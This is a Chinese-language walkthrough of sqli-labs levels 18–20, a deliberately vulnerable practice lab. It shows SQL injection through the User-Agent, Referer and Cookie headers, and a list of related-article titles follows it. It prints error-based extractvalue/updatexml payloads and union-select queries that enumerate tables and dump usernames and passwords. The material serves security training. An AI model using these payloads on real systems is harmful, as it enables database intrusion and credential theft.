less18 基于错误的用户代理,头部POST注入

admin
admin
登入成功(进不去重置数据库)
显示如下

有user agent参数,可能存在注入点

显示版本号:

爆库:User-Agent:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

库名:

less19基于头部的RefererPOST报错注入

抓包
admin登陆什么也没有
在referer后加单引号有回显sql语法错误
然后就和 18一样了:Referer: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
爆库:

less20 基于错误的cookie头部POST注入

admin登陆:

本关登录成功后用户名会存储在cookie中,且通过该参数执行SQL语句

登录成功之后会设置里面的cookie 当二次刷新的时候 这时候会重新从里面取值弄,并且这次取值没有经过过滤 直接就是注入点 还是使用updatexml的函数进行报错

方法一:
cookie注入:uname=admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #

方法2:
cookie 后加单引号出现报错,说明cookie处存在注入点

'order by 3 --+      // 回显正常
'order by 4 --+         // 回显错误//说明行数有3个,即3个显示位


爆库名:

之后就是爆表:

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

爆字段:

union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

爆值:

union select 1,2,group_concat(username,0x3a,password) from users--+

sqli-lab————Writeup(18~20)各种头部注入相关推荐

  1. 网络安全——HTTP头部注入

    一.HTTP头部注入概述 1.HTTP工作原理 2.HTTP报文类型 (1).请求报文 (2).响应报文 3.HTTP头部内容 referer主要用来统计页面访问次数 二.HTTP头部注入 1.原理: ...

  2. Fedora 15 16 17 18 20无线网卡驱动安装

    Fedora 15 16 17 18 20无线网卡驱动安装 一直不想在虚拟机中安装使用系统,然后就打算给自己的电脑安装一个双系统,因对Fedora有比较好的印象,也就还是选用了它作为我的第二系统.废话 ...

  3. SOL注入——HTTP头部注入(2)(七)

    本章目的 普及HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义和作用,掌握HTTP头部注入的原理.方法及基本流程. HTTPHeader概述 ...

  4. SOL注入——HTTP头部注入(六)

    本章目的 普及HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义和作用,掌握HTTP头部注入的原理.方法及基本流程. HTTPHeader概述 ...

  5. 2016年10月9日 星期日 --出埃及记 Exodus 18:20

    2016年10月9日 星期日 --出埃及记 Exodus 18:20 Teach them the decrees and laws, and show them the way to live an ...

  6. SQL注入--HTTP头部注入

    实验目的 理解HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理.方法及基本流程. 实验原理 有时候,后台开 ...

  7. SQL注入-HTTP头部注入

    访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-11.访问的URL为: http://[靶机IP ...

  8. host头部注入漏洞--中危

    host头部注入漏洞--中危 漏洞原理 漏洞知识扩展 漏洞验证 情况一 情况二 修复方案 漏洞原理 为了方便获取网站域名,开发人员一般依赖于请求包中的Host首部字段.例如,在php里用_SERVER ...

  9. SQL注入——HTTP头部注入

    实验目的 理解HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理.方法及基本流程. 实验原理 有时候,后台开 ...

最新文章

  1. 轻轻的我走了,正如我轻轻的来…——ADO.NET核心类的灭度与SQLHelper的诞生——十八相送(下)...
  2. 微服务架构下分布式事务解决方案 —— 阿里GTS
  3. C语言学习:snprintf()函数
  4. 介绍一份数据分析报告
  5. SilverLight:布局(3)StackPanel 对象
  6. [导入]jbuilder 2006开发struts+sqlserver2K准备工作
  7. java调用python脚本并向python脚本传递参数
  8. java integer集合排序_Java集合中List的Sort()方法进行排序
  9. git使用kdiff3合并乱码问题
  10. iphone自动下载当天VOA
  11. 下载书籍的网址【汇总】
  12. PR连接蓝牙后无声音
  13. Mobaxterm 中文输入Backspace按键问题
  14. C14:Unity3D制作智能家居设计软件——双屏互动室内漫游
  15. php开发公众号素材管理总结
  16. 写一个块linux设备驱动
  17. java移动小球_使用java实现持续移动的小球
  18. 计算机键盘时好时坏,机子的CTRL键时好时坏?
  19. 基于FPGA的MPPT系统开发
  20. Pubwin 2007有奖“找茬”计划

热门文章

  1. git设置mergetool可视化工具
  2. Elasticsearch7.15.2 出现 node validation exception 的问题处理
  3. Vue项目npm打包推荐方式
  4. linux CentOS7 最小化安装环境静默安装Oracle11GR2数据库(安装操作系统环境_01)
  5. form表单提交,后台实体类接收转义问题 解决方案
  6. MyBatis-Plus_通用service
  7. 查看linux系统版本信息(Oracle Linux、Centos Linux、Redhat Linux、Debian、Ubuntu)
  8. go 根据输入类型执行对应的方法_安全很重要:Go项目的安全评估技术
  9. ensp安装对电脑配置要求高吗_直线导轨有哪些安装方法?为什么直线导轨安装精度要求高?...
  10. eclipse html页面校验,当我在Eclipse浏览器中运行url时,HTML表单未通过验证